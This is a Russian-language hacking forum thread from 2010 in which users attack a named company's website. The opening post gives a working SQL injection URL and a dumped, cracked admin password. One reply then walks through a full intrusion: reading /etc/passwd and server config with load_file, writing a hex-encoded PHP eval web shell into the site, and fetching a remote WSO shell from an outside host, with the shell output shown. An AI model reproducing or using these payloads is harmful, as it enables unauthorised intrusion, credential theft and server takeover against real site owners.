SQL-инъекция
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
SQL-инъекция - 2010-05-17 19:39:53.790000
|
|
|
vikiana
Сообщений: 2
Оценки: 0
Присоединился: 2010-05-17 19:28:20.270000
|
Помогите понять в чем причина, вот SQL инъекция на сайтe http://dunstarltd.com/product.php?id=-1049'+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name='probid_admins'/* , перебором получила admin:admin и password: 064d8a03246a628f45403bf505ef69f3 (Silistra902). Админка у сайта http://dunstarltd.com/login.php. Проблема в том, что в админку не могу попасть с етими данными?
|
|
|
RE: SQL-инъекция - 2010-05-17 23:09:54.003333
|
|
|
Deamon.32
Сообщений: 667
Оценки: 0
Присоединился: 2010-01-03 23:15:57.100000
|
Хм странно, у меня даже не вылетает ошибка - просто обновляется страница…
|
|
|
RE: SQL-инъекция - 2010-05-17 23:25:36.546666
|
|
|
Sunzer
Сообщений: 253
Оценки: 31190
Присоединился: 2007-06-15 19:23:32.436666
|
quote:
password: 064d8a03246a628f45403bf505ef69f3 А хэш сбрутили?
|
|
|
RE: SQL-инъекция - 2010-05-17 23:30:22.053333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
пасворд Silistra902
|
|
|
RE: SQL-инъекция - 2010-05-18 01:05:08.800000
|
|
|
vikiana
Сообщений: 2
Оценки: 0
Присоединился: 2010-05-17 19:28:20.270000
|
Вот именно пасворд Silistra902, логин admin, а в админку ни как попасть нелзя
|
|
|
RE: SQL-инъекция - 2010-05-18 03:00:25.420000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
file_priv=Y, magic_quotes=OFF, льем шелл
1) http://dunstarltd.com/product.php?id=-1049'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
2) http://dunstarltd.com/product.php?id=-1049'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
<VirtualHost 80.72.80.242:80>
ServerName dunstarltd.com <================!
ServerAlias www.dunstarltd.com
DocumentRoot /home/lun0/vhost/dunstar <================!
ErrorLog /var/log/httpd/error_log
</VirtualHost>
3) http://dunstarltd.com/product.php?id=-1049'+union+select+1,load_file('/home/lun0/vhost/dunstar/product.php'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* - оно
4) http://dunstarltd.com/product.php?id=-1049'+union+select+1,3C3F7068702069662028697373657428245F524551554553545B6C615D2929206576616C287374726970736C617368657328245F524551554553545B6C615D29293B3F3E,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user+into+dumpfile+'/home/lun0/vhost/dunstar/images/zzz.php'/*
где:
3C3F7068702069662028697373657428245F524551554553545B6C615D2929206576616C287374726970736C617368657328245F524551554553545B6C615D29293B3F3E
это:
<?php if (isset($_REQUEST[la])) eval(stripslashes($_REQUEST[la]));?>
5) http://dunstarltd.com/images/zzz.php?la=phpinfo();
Linux bojidar.com 2.6.18-92.1.22.el5 #1 SMP Tue Dec 16 06:45:03 EST 2008 x86_64
allow_url_fopen=yes
6) http://dunstarltd.com/images/zzz.php?la=eval(file_get_contents('http://site.ru/wso.txt'));
где wso.txt предварительно подготовлен вот так:
http://forum.xakep.ru/m_1759922/tm.htm
и всё, у нас шелл, и никаких паролей не надо
Uname: Linux bojidar.com 2.6.18-92.1.22.el5 #1 SMP Tue Dec 16 06:45:03 EST 2008 x86_64 [exploit-db.com]
User: 48 ( apache ) Group: 48 ( apache )
Php: 5.1.6 Safe mode: OFF [ phpinfo ] Datetime: 2010-05-18 01:53:08
Hdd: 4578.96 GB Free: 4239.67 GB (92%)
Cwd: /home/lun0/vhost/dunstar/images/ drwxrwxrwx [ home ]
к тому же ядро рутаемое
|
|
|
RE: SQL-инъекция - 2010-05-18 03:19:58.706666
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
Я думаю для http://dunstarltd.com/login.php вам нужно не probid_admins а probid_users.
|
|
|
|
|